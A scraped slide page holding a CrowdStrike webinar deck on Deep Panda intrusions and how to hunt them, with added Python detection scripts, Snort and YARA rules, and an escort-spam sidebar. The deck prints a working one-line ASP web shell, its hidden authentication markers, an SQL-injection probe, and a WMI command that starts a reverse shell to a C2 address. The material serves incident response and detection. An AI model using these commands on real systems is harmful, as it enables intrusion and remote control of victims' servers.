Good Guys vs Bad Guys: Using Big Data to Counteract Advanced ThreatsGood Guys vs Bad Guys: Using Big Data to Counteract Advanced Threats
Good Guys vs Bad Guys: Using Big Data to Counteract Advanced Threats
 
Top Security Trends for 2014
Top Security Trends for 2014Top Security Trends for 2014
Top Security Trends for 2014
 
Emulating an Adversary with Imperfect Intelligence
Emulating an Adversary with Imperfect IntelligenceEmulating an Adversary with Imperfect Intelligence
Emulating an Adversary with Imperfect Intelligence
 
MITRE ATT&CKcon 2.0: State of the ATT&CK; Blake Strom, MITRE
MITRE ATT&CKcon 2.0: State of the ATT&CK; Blake Strom, MITREMITRE ATT&CKcon 2.0: State of the ATT&CK; Blake Strom, MITRE
MITRE ATT&CKcon 2.0: State of the ATT&CK; Blake Strom, MITRE
 
Beyond S3 Buckets - Effective Countermeasures for Emerging Cloud Threats
Beyond S3 Buckets - Effective Countermeasures for Emerging Cloud ThreatsBeyond S3 Buckets - Effective Countermeasures for Emerging Cloud Threats
Beyond S3 Buckets - Effective Countermeasures for Emerging Cloud Threats
 
Defending Threats Beyond DDoS Attacks: Featuring Guest Speaker from IDC
Defending Threats Beyond DDoS Attacks: Featuring Guest Speaker from IDCDefending Threats Beyond DDoS Attacks: Featuring Guest Speaker from IDC
Defending Threats Beyond DDoS Attacks: Featuring Guest Speaker from IDC
 

Kürzlich hochgeladen

08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking MenDelhi Call girls
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)Gabriella Davis
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Patryk Bandurski
 
Benefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksBenefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksSoftradix Technologies
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024Scott Keck-Warren
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024Rafal Los
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsEnterprise Knowledge
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphNeo4j
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 3652toLead Limited
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slidespraypatel2
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdfhans926745
 
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...HostedbyConfluent
 
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 
How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?XfilesPro
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersEnhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersThousandEyes
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking MenDelhi Call girls
 
Key Features Of Token Development (1).pptx
Key  Features Of Token  Development (1).pptxKey  Features Of Token  Development (1).pptx
Key Features Of Token Development (1).pptxLBM Solutions
 

Kürzlich hochgeladen (20)

08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
 
Benefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksBenefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other Frameworks
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slides
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
 
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersEnhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
Key Features Of Token Development (1).pptx
Key  Features Of Token  Development (1).pptxKey  Features Of Token  Development (1).pptx
Key Features Of Token Development (1).pptx
 

CrowdCasts Monthly: Going Beyond the Indicator

  • 8. About CrowdStrike Services
    COMPREHENSIVE OFFERINGS
    • Incident Response Investigations
    • Proactive Threat Assessments
    • IR Program Development
    INDUSTRY VETERANS
    • Average of ten years IR industry experience
    • Backgrounds in IR consulting, government, and defense
    • Specialists in a broad range of technologies
    VARIETY OF CUSTOMER VERTICALS
    • Finance, Technology, Manufacturing, Retail, Healthcare, Telecommunications, Oil & Gas, Entertainment
    (Graphic: WHO = adversary; WHY = intent; WHAT = malware, industry)
  • 9. And there are a lot of adversaries
    Adversary groups our Intelligence team tracks (map graphic). Origins labelled on the slide: CHINA, IRAN, INDIA, RUSSIA, plus crime syndicates.
    Targeted sectors labelled on the slide: Commercial, Government, Non-profit; Financial, Technology, Communications; Defense & Aerospace, Industrial Engineering, NGOs; Financial Sector; Dissident Groups; Electronics & Communications; G20, NGOs, Dissident Groups; Energy Companies; Government, Legal, Financial, Media, Telecom; Oil and Gas Companies
  • 10. TYPICAL ATTACKER TTPS
  • 11. Typical Attacker TTPs
    • Initial Attack Vector
    • Malware
      – Persistence Mechanism
      – Command & Control
      – Functionality
    • Lateral Movement
    • Data Extraction/Theft
  • 12. Shift in Attacker TTPs
    Attacker TTP: Initial Attack Vector
      Historical: Spearphish and vulnerable external-facing applications (most common)
      Current:    No significant change
    Attacker TTP: Malware, Persistence Mechanism
      Historical: Installed as a service, Run key, etc.
      Current:    No persistence
    Attacker TTP: Malware, Command & Control
      Historical: Beacon to a malicious IP or domain
      Current:    No standard beacon activity
    Attacker TTP: Malware, Functionality
      Historical: Simple; provides a shell or basic upload/download functionality
      Current:    Robust; includes all required functionality and commands
    Attacker TTP: Malware, Location
      Historical: Written to disk
      Current:    Memory-resident
  • 13. Shift in Attacker TTPs (Cont.)
    Attacker TTP: Lateral Movement
      Historical: Net Use, RDP or utilities (e.g. PsExec)
      Current:    WMI, service accounts
    Attacker TTP: Obfuscation
      Historical: Timestomp the $STANDARD_INFORMATION times only (Windows API)
      Current:    Timestomp both the $STANDARD_INFORMATION and $FILE_NAME times (Windows API plus direct MFT manipulation), so the usual API-vs-MFT timestamp comparison no longer exposes it
    Attacker TTP: Data Extraction
      Historical: Compress data and send it to a compromised host at a hosting provider
      Current:    No significant change
    Attacker TTP: Last Hop Communication
      Historical: Source-country IPs (most often Chinese, Russian, Iranian)
      Current:    North American IPs, anonymous VPN solutions, cloud
  • 14. Catalyst for Change
    Shifts in tactics follow increased intel sharing:
    • Whitepapers
    • Blog posts
    • Conference demos
    • VirusTotal
    • US Government JIB (Joint Indicator Bulletin)
    Pros
    • Increased awareness / detection for public companies
    • Decreased intel gap for smaller organizations
    • Increased costs for attackers to change TTPs
    Cons
    • Indicators become less effective as attackers shift TTPs (e.g. new malware, new C2 infrastructure)
    • Attacks become more advanced to avoid current methods of detection
    • Reduces visibility into what the attacker is doing and/or targeting
  • 15. CASE STUDIES
  • 16. Case Studies – Background
    • Company #1
      – Compromised in 2012 using historical TTPs
      – Partial remediation February 2013
      – Re-compromised March 2013 with new TTPs
    • Company #2
      – Compromised March 2013
      – The new TTPs from the Company #1 re-compromise were observed
  • 17. Timeline
    February to April 2013, in order:
    • Company #1 investigation commences (traditional tactics)
    • Intel community shares the TTPs widely
    • Company #1 partial remediation; logging and monitoring put in place for the old tactics
    • Company #2 investigation commences (new tactics)
    • Company #1 re-compromised (new tactics)
  • 18. NEW TACTICS EXPLAINED
  • 19. Deep Panda – Simple Web Shell
    <%execute request(chr(42))%>
    • 28-byte web shell
    • Active Server Page (classic ASP) file
      – chr(42) is "*", so the shell reads the request parameter named "*"
      – Expected input is VBScript code, URL-encoded (each byte sent as %XX)
    • The execute() function runs any VBScript passed to it, with the privileges of the web application's identity
      – Upload / download files
      – Execute arbitrary commands (including WMI)
      – Full access to the file system
    • Controlled by an attacker "thick client"
  • 20. Deep Panda – Simple Web Shell
    As a simple example of an encoded command, the following GET request would cause the backdoor to execute the VBScript Response.Write("<h1>Hello World</h1>") and render "Hello World" in the browser:
    http://<webserver>/showimage.asp?*=%52%65%73%70%6F%6E%73%65%2E%57%72%69%74%65%28%22%3C%68%31%3E%48%65%6C%6C%6F%20%57%6F%72%6C%64%3C%2F%68%31%3E%22%29
    ASP URL-decodes the "*" parameter before execute() runs it, so the attacker's payload never appears in clear text in the request line.
  • 21. Deep Panda – Complex Web Shell
    • Ability to impersonate a user (with valid credentials)
    • Eight different commands
      – File system, SQL Server, and Active Directory requests
      – Upload / download files
      – Compile and execute any C# code
  • 22. Web Shell Authentication
    • Rudimentary (but effective) authentication for incoming connections; the shell only serves requests that carry one of:
      – a cookie named 'zWiz'
      – the HTTP header Keep-Alive: 320
      – an Accept-Language header containing es-DN (not a valid locale)
    • Crawlers and vulnerability scanners never send these markers, which prevents identification via search-engine indexing or scanning
  • 23. Web Shells – But Why?
    • Primary foothold back into the victim organization
    • Less reliant on malware installed on systems and beaconing to a C2
    • Why?
      – Low to virtually no detection by antivirus products
      – No command-and-control beacon traffic to detect
      – Blocking known malicious IP addresses at the web server is impractical, since the adversary can easily change their source IP address
      – Cookie- and HTTP-header-aware web shells avoid being enumerated by search engines and restrict access, further reducing their network footprint
  • 24. Second Stage Malware
    Flow shown on the slide: Adversary -> Anonymous VPN or Proxy -> Access Web Shell -> Web Server -> Upload Malware -> Execution using Web Shell -> Lateral Movement and Data Theft, with the second-stage malware reaching separate C2 Infrastructure
    Why?
    • No command-and-control beacon activity
    • Change IP/domain on the fly
    • Runs in memory
    • Limits forensic artifacts
  • 25. Lateral Movement
    Flow shown on the slide: Adversary -> Anonymous VPN or Proxy -> Access Web Shell -> Web Server -> Leverage WMI -> Host 2 -> C2 Infrastructure (59.111.22.222)
    Command run on the web server (cmd.exe launching the dropped tool):
    c:\bad.exe /f wmi /s Host2 /u Host2\Administrator /p "P@ssW0rd" /m call /q "Win32_Process" /c Create - CommandLine:"C:\bad.exe /f sh /s 59.111.22.222 /p 443"
    i.e. a remote Win32_Process.Create on Host2, authenticated with a local administrator password, that starts a copy of the tool in shell mode connecting back to the C2 on port 443.
    Custom VB script "PsExec" utility
    • 4 KB script to remotely launch a process as a specified user
    • Run with cscript.exe; arguments: username, password, remote host, process path
    Why WMI?
    • Evades most typical logging; it shows up only as WMI service activity on the target
    • Powerful functionality, built into Windows
  • 26. HUNTING AND DETECTING
  • 27. Go Beyond the Indicator
    • New evil requires new approaches for detection
    • Look through multiple haystacks for a single needle
      – The evil stands out with the right methodology
    • Blog series: Mo' Shells Mo' Problems
    http://www.crowdstrike.com/blog/
  • 28. Hunting – WMI Activity
    • Windows XP and Server 2003 had limited logging
      – %systemroot%\system32\wbem\logs
    • Windows 7 and Server 2008 do NOT log WMI activity by default
      – Help investigators help you: enable the trace channel ahead of time:
        wevtutil.exe sl Microsoft-Windows-WMI-Activity/Trace /e:true
      – Review the resulting WMITracing.log via Event Viewer
    • Be familiar with your environment's legitimate use of WMI, otherwise the trace is noise
  • 29. Hunting Web Shells – Identifying Intrusion Points
    • Web shells are often one of the earliest stages of malware
    • Search for activity on the system near the first known compromise time
      – Successful web scans in logs
      – SQL injection
      – Dropper malware
      – Lateral movement from other compromised systems
      – Pages created or modified within the webserver document root
    Example IIS log entry of an SQL injection probe (decoded, the query is id=1' or 1=@@version--):
    2013-08-25 13:03:53 GET item-details.aspx id=1%27%20or%201=@@version-- - 80 - <redacted IP>
  • 30. Hunting Web Shells – File Stacking
    • File stacking is based on the concept of least frequency of occurrence
    • Collect files from all of your webservers and investigate the outliers
      – What files do not exist on other web servers?
      – PHP | JSP | ASP | ASPX | CFM
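File stacking across a web farm, as an added example that is not part of the original deck or CrowdStrike's tooling: script-file inventories from several web servers are compared, and any file that exists on only one server, or whose content hash differs from the majority copy, is reported. The three server inventories and their digests are constructed for the demonstration; inventory_dir() shows how a real inventory would be built from a document root with SHA-256.

```python
"""File stacking: least frequency of occurrence across web servers.

Added example. SAMPLE_INVENTORIES is constructed (fake digests); a real
hunt would build one inventory per server with inventory_dir().
"""
import hashlib
import os
from collections import Counter, defaultdict

# Extensions the deck calls out, plus two common IIS handler types.
SCRIPT_EXTS = {".php", ".jsp", ".asp", ".aspx", ".cfm", ".ashx", ".asmx"}


def inventory_dir(docroot, exts=SCRIPT_EXTS):
    """Map each script file under docroot (relative path, '/' separators) to its SHA-256."""
    inv = {}
    for dirpath, _, files in os.walk(docroot):
        for name in files:
            if os.path.splitext(name)[1].lower() not in exts:
                continue
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, docroot).replace(os.sep, "/")
            with open(full, "rb") as fh:
                inv[rel] = hashlib.sha256(fh.read()).hexdigest()
    return inv


# Constructed inventories for three hypothetical servers. web02 carries an
# extra showimage.asp; web03's item-details.aspx has been modified.
SAMPLE_INVENTORIES = {
    "web01": {"default.aspx": "a1" * 32, "item-details.aspx": "b2" * 32,
              "admin/login.aspx": "c3" * 32},
    "web02": {"default.aspx": "a1" * 32, "item-details.aspx": "b2" * 32,
              "admin/login.aspx": "c3" * 32, "showimage.asp": "d4" * 32},
    "web03": {"default.aspx": "a1" * 32, "item-details.aspx": "e5" * 32,
              "admin/login.aspx": "c3" * 32},
}


def stack_files(inventories, max_servers=1):
    """Paths present on at most max_servers servers (but not on all of them)."""
    seen = defaultdict(set)
    for server, inv in inventories.items():
        for path in inv:
            seen[path].add(server)
    total = len(inventories)
    return sorted((path, sorted(servers)) for path, servers in seen.items()
                  if len(servers) <= max_servers and len(servers) < total)


def stack_hashes(inventories):
    """For paths on two or more servers, report servers whose copy differs from the majority."""
    by_path = defaultdict(dict)  # path -> {server: digest}
    for server, inv in inventories.items():
        for path, digest in inv.items():
            by_path[path][server] = digest
    outliers = []
    for path, copies in sorted(by_path.items()):
        if len(copies) < 2:
            continue
        majority = Counter(copies.values()).most_common(1)[0][0]
        odd = sorted(server for server, digest in copies.items() if digest != majority)
        if odd:
            outliers.append((path, odd))
    return outliers


if __name__ == "__main__":
    for path, servers in stack_files(SAMPLE_INVENTORIES):
        print(f"only on {servers}: {path}")
    for path, servers in stack_hashes(SAMPLE_INVENTORIES):
        print(f"content differs on {servers}: {path}")
```

A file that exists on a single server is the classic web-shell signal, but the hash comparison matters just as much: the Deep Panda ASP shell is 28 bytes and is easily appended to an existing, legitimate page, which file presence alone would never flag.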
  • 31. Hunting Web Shells – Web Log Review
    • Perform statistical analysis of page requests and search for outliers
      – See exactly when the web shells were in use via the web logs
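The log-review steps from slides 20, 29 and 31 combined into one script, as an added example that is not part of the original deck: it parses IIS W3C log lines using the #Fields: directive, URL-decodes each query string, flags requests that carry the minimal shell's "*" parameter (decoding the VBScript inside it) or an SQL-injection probe, and stacks the requested pages by least frequency of occurrence. The log excerpt is constructed; the column layout and IP addresses are assumptions, and the two interesting lines reproduce the request shapes shown on the slides.

```python
"""Hunt IIS W3C logs for the Deep Panda ASP shell and SQL-injection probes.

Added example. SAMPLE_LOG is constructed, not a real capture; decoding of
the '*' parameter follows the 28-byte shell's use of request(chr(42)).
"""
import re
from collections import Counter
from urllib.parse import parse_qsl

SAMPLE_LOG = """#Software: Microsoft Internet Information Services 7.5
#Fields: date time cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip
2013-08-25 13:01:10 GET /item-details.aspx id=17 80 - 203.0.113.5
2013-08-25 13:02:41 GET /item-details.aspx id=42 80 - 203.0.113.9
2013-08-25 13:03:53 GET /item-details.aspx id=1%27%20or%201=@@version-- 80 - 198.51.100.23
2013-08-25 13:05:02 GET /images/logo.png - 80 - 203.0.113.5
2013-08-25 13:07:19 GET /item-details.aspx id=8 80 - 203.0.113.11
2013-08-25 13:09:44 GET /showimage.asp *=%52%65%73%70%6F%6E%73%65%2E%57%72%69%74%65%28%22%3C%68%31%3E%48%65%6C%6C%6F%20%57%6F%72%6C%64%3C%2F%68%31%3E%22%29 80 - 198.51.100.23
"""

# Crude but useful: quote-then-boolean, MSSQL version probe, comment terminator, stacked exec.
SQLI_RE = re.compile(r"('\s*(or|and)\s+|@@version|--\s*$|;\s*(exec|xp_))", re.I)
# VBScript calls an attacker would send through execute(): output, COM objects, nested eval.
VBS_RE = re.compile(r"(response\.write|createobject|getobject|execute|eval)\s*\(", re.I)


def parse_iis_log(text):
    """Yield one dict per request, naming columns from the #Fields: directive."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        parts = line.split(" ")
        if len(parts) != len(fields):
            continue  # skip truncated lines rather than mis-assign columns
        yield dict(zip(fields, parts))


def decode_query(query):
    """URL-decoded (name, value) pairs; IIS writes '-' for an empty query."""
    if query in ("", "-"):
        return []
    return parse_qsl(query, keep_blank_values=True)


def flag_request(rec):
    """Reasons this request looks like web-shell or injection traffic (empty if clean)."""
    reasons = []
    for name, value in decode_query(rec["cs-uri-query"]):
        if name == "*":
            # Only the minimal shell reads request("*"); no normal app names a parameter '*'.
            reasons.append("star-parameter")
            if VBS_RE.search(value):
                reasons.append("vbscript-payload")
        if SQLI_RE.search(value):
            reasons.append("sql-injection")
    return reasons


def stack_uris(records):
    """Least-frequency-of-occurrence view of requested pages, rarest first."""
    counts = Counter(r["cs-uri-stem"] for r in records)
    return sorted(counts.items(), key=lambda kv: (kv[1], kv[0]))


def hunt(text):
    """Return (flagged requests as (time, client, uri, reasons), uri stack)."""
    records = list(parse_iis_log(text))
    hits = [(r["time"], r["c-ip"], r["cs-uri-stem"], flag_request(r)) for r in records]
    return [h for h in hits if h[3]], stack_uris(records)


if __name__ == "__main__":
    hits, stack = hunt(SAMPLE_LOG)
    for hit in hits:
        print("HIT", hit)
    for uri, n in stack:
        print(f"{n:6d} {uri}")
```

The URI stack puts showimage.asp at the bottom next to static assets, which is why the count alone is not enough: the decoded query is what separates a rarely requested image handler from a shell. Pivot on the client address once a hit is found; the same source that sent the injection probe is the one driving the shell in the constructed data, and that is usually true in real logs too.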
  • 32. Hunting Web Shells – Network Monitoring
    • Stack web requests from network data
    • Leverage cyber intelligence feeds to detect known web shells
      – Unique header attributes
      – HTML used to produce the shell
    Example Snort rule for the C# web shell's header-based authentication (sid and rev are left as placeholders on the slide):
    alert tcp $EXTERNAL_NET any -> $WEB_SERVERS $HTTP_PORTS (msg:"CrowdStrike Deep Panda CSharp Webshell Headers"; content:"Keep-Alive: 320"; http_raw_header; content:"es-DN"; http_raw_header; flow:established,to_server; classtype:trojan-activity; metadata:service http; sid:xxx; rev:xxx;)
    Both content matches must appear in the same request, so a session authenticated with only the zWiz cookie would not fire this rule; pair it with a cookie-based rule to cover all three markers from slide 22.
  • 33. Hunting – Memory Resident Malware
    • "Fileless" forensics fun
    • Persistence? We don't need no stinkin' persistence
    • A new approach to malware means a new approach to forensics
    • Hidden, not invisible
    • What's normal and what's new?
      – Get to know your systems
      – Image memory, review, rinse and repeat
  • 34. Hunting with YARA
    • YARA signatures can be used to search your enterprise for specific patterns on disk and in memory
    rule CrowdStrike_13091_01 : deep_panda alice RAT
    {
        meta:
            description = "Detection of Mad Hatter .NET RAT"
            last_modified = "2013-10-08"
            version = "1.1"
            in_the_wild = true
            copyright = "CrowdStrike, Inc"
            report = "CSIT-13091"
        strings:
            $marker1 = "alice'srabbithole" wide
            $marker2 = "{{\"Version\":{0},\"HostName\":\"{1}\",\"osVersion\": \"{2}\",\"tm\": \"{3}\",\"tz\":{4}}}" wide
            $marker3 = "InstManager.pdb"
            $marker4 = "<osVersion>"
            $marker5 = "<tm>"
            $marker6 = "<tz>"
        condition:
            uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and 2 of ($marker*)
    }
    • The inner quotes of $marker2 must be backslash-escaped for the rule to compile; "wide" matches the string as UTF-16LE, which is how .NET stores literals
    • The condition only fires on PE files (MZ at offset 0, "PE\0\0" at e_lfanew) that contain at least two of the six markers
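The rule's condition evaluated in plain Python, as an added example that is not part of the original deck or of YARA: it shows what the header checks and the "wide" modifier actually test, and why "2 of" is used rather than a single string. The sample buffers are constructed stand-ins, not Mad Hatter samples; only the marker strings come from the rule on the slide.

```python
"""Mirror the CrowdStrike_13091_01 condition: MZ header, PE signature, 2 of 6 markers.

Added example. build_sample() constructs fake buffers; it does not produce
a real .NET binary.
"""
import struct

# Strings from the rule; True marks a 'wide' string, matched as UTF-16LE.
MARKERS = {
    "marker1": ("alice'srabbithole", True),
    "marker2": ('{{"Version":{0},"HostName":"{1}","osVersion": "{2}","tm": "{3}","tz":{4}}}', True),
    "marker3": ("InstManager.pdb", False),
    "marker4": ("<osVersion>", False),
    "marker5": ("<tm>", False),
    "marker6": ("<tz>", False),
}


def encode_marker(text, wide):
    """Bytes YARA would search for: UTF-16LE for 'wide' strings, ASCII otherwise."""
    return text.encode("utf-16-le") if wide else text.encode("ascii")


def looks_like_pe(data):
    """uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550, with bounds checks."""
    if len(data) < 0x40 or struct.unpack_from("<H", data, 0)[0] != 0x5A4D:
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 4 > len(data):
        return False
    return struct.unpack_from("<I", data, e_lfanew)[0] == 0x00004550


def matched_markers(data):
    """Names of the markers whose encoded bytes occur anywhere in data."""
    return sorted(name for name, (text, wide) in MARKERS.items()
                  if encode_marker(text, wide) in data)


def rule_matches(data, threshold=2):
    """The full condition: PE header checks and at least `threshold` markers."""
    return looks_like_pe(data) and len(matched_markers(data)) >= threshold


def scan_file(path):
    """Apply the rule to a file on disk and return (matched, marker names)."""
    with open(path, "rb") as fh:
        data = fh.read()
    return rule_matches(data), matched_markers(data)


def build_sample(markers, pe=True):
    """Constructed buffer: a minimal MZ/PE header (or zeros) followed by the chosen markers."""
    hdr = bytearray(0x100)
    if pe:
        hdr[0:2] = b"MZ"
        struct.pack_into("<I", hdr, 0x3C, 0x80)   # e_lfanew -> offset 0x80
        hdr[0x80:0x84] = b"PE\x00\x00"            # 0x00004550 little-endian
    body = b"\x00".join(encode_marker(*MARKERS[m]) for m in markers)
    return bytes(hdr) + body


if __name__ == "__main__":
    for label, buf in [("two markers, PE", build_sample(["marker1", "marker3"])),
                       ("one marker, PE", build_sample(["marker1"])),
                       ("two markers, not PE", build_sample(["marker1", "marker3"], pe=False))]:
        print(f"{label}: match={rule_matches(buf)} markers={matched_markers(buf)}")
```

Two things the plain-Python version makes obvious. The header test is what keeps the rule from firing on text files, log dumps or your own detection notes that happen to quote the markers; and because marker1 is "wide", an ASCII copy of alice'srabbithole in a file does not count, which is the right behaviour for a .NET string but means a memory scan of a process that has decoded the string differently can miss it.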
  • 35. CrowdResponse • Free CrowdStrike Community Tool • Collect and Analyze Artifacts Across Your Enterprise • Available Modules – DirList – YARA – PSList • Many Modules Coming Soon © 2014 CrowdStrike, Inc. All rights reserved. 35 http://www.crowdstrike.com/community-tools/
  • 36. 36 BEST PRACTICE PREPARATIONS 2014 Crowdstrike, Inc. All rights reserved.
  • 37. Best Practices
    • Proactive Defense of Your Network
      – Isolate Critical Assets with Network Segmentation
      – Consolidate and Monitor Internet Egress Points
      – Implement Centralized Logging
      – Patch, Patch, and Patch Again
      – Secure Web Applications and Internal Software Projects
      – Minimize or Remove Local Admin Privileges
      – Implement a Tiered Active Directory Admin Model
      – Incorporate Cyber Intelligence Feeds
  • 38. CrowdStrike Can Help!
    • Services to Consider
      – Tabletop Assessments (Yearly at Least)
        • Keep your team primed and educated on the latest attack vectors
      – Next-Gen Penetration Testing
        • More than just a cursory glance: take a real-world scenario approach
      – Incident Response, Disaster Recovery and Business Continuity Plans
